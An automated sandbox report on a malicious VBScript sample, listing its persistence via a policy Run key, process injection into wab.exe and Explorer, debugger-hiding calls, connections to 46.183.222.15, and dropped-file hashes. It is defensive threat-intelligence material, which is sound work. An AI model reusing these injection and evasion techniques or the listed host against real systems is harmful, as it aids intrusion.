Malware Analysis Report

2025-03-15 01:15

Sample ID 240614-cktssavgjq
Target f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e.vbs
SHA256 f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e
Tags persistence
Score 8/10

Analysis Overview

score
8/10

SHA256

f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e

Threat Level: Likely malicious

The file f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e.vbs was found to be: Likely malicious.

Malicious Activity Summary

persistence

Blocklisted process makes network request

Adds policy Run key to start application

Checks computer location settings

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 02:08

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 02:08

Reported

2024-06-14 02:11

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e.vbs"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Schenkelvigningers.sam && echo t"

Network

Country Destination Domain Proto
LV 46.183.222.15:80 tcp
LV 46.183.222.15:80 tcp
LV 46.183.222.15:80 tcp
LV 46.183.222.15:80 tcp
LV 46.183.222.15:80 tcp
LV 46.183.222.15:80 tcp

Files

memory/3856-0-0x00007FF85A9B3000-0x00007FF85A9B5000-memory.dmp

memory/3856-1-0x000001A16AF40000-0x000001A16AF62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sikjojhh.ufd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3856-11-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp

memory/3856-12-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp

memory/3856-13-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp

memory/3856-14-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp

memory/3856-15-0x00007FF85A9B0000-0x00007FF85B471000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 02:08

Reported

2024-06-14 02:11

Platform

win7-20240611-en

Max time kernel

149s

Max time network

147s

Command Line

C:\Windows\Explorer.EXE

Signatures

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \Registry\User\S-1-5-21-39690363-730359138-1046745555-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\extrac32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\IZILLDQXRHV = "C:\\Program Files (x86)\\windows mail\\wab.exe" C:\Windows\SysWOW64\extrac32.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3036 set thread context of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2396 set thread context of 1308 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\Explorer.EXE
PID 2396 set thread context of 1044 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\extrac32.exe
PID 1044 set thread context of 1308 N/A C:\Windows\SysWOW64\extrac32.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 2636 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1968 wrote to memory of 2636 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1968 wrote to memory of 2636 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 2516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2636 wrote to memory of 2516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2636 wrote to memory of 2516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2636 wrote to memory of 3036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3036 wrote to memory of 2476 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2476 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2476 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2476 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3036 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3036 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3036 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3036 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3036 wrote to memory of 2396 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1308 wrote to memory of 1044 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\extrac32.exe
PID 1308 wrote to memory of 1044 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\extrac32.exe
PID 1308 wrote to memory of 1044 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\extrac32.exe
PID 1308 wrote to memory of 1044 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\extrac32.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f2061ea9095fd5505fd3812502961c20f5c32b3452b35450728a9f3e0bdbae4e.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Schenkelvigningers.sam && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Schenkelvigningers.sam && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\extrac32.exe

"C:\Windows\SysWOW64\extrac32.exe"

Network

Country Destination Domain Proto
LV 46.183.222.15:80 46.183.222.15 tcp
LV 46.183.222.15:80 46.183.222.15 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab676C.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49M9BHF86VFWLGXOAQDX.temp

MD5 19f8ca6aca9eb8b8d3bce549d4a9a4d9
SHA1 d4bb7eb231fd996238bfab18ec5984afab0d68fd
SHA256 18e48a226c9057f2eed4742246a7005c331cd799da0bc4e13f801aa10d796e5c
SHA512 d4e21f1b0672cfd17e5b42f6746cf7b76ac21535aff6dab5c0a8a6b511133338fa02ccfedf342a92925b9a74bf1334fbd2d66c430f0edf6f3a2a353c8bc42dda

C:\Users\Admin\AppData\Roaming\Schenkelvigningers.sam

MD5 9a68c95ad5b5da02da5f2bb483de9d76
SHA1 e555b4aad443585e6874ece154def81c7fe805e2
SHA256 6ae7efbb0fe7f146254b0a191a5af7866754b97548cf050529e4491e0e913dbc
SHA512 dd10ff9c44a790d5db6b1057cefb91564365a00a009d23129618e4a7329d4a71d3dbefc20baa5ff36e6bed037cf825a6d02433af9c59c74573415226eeaecb41
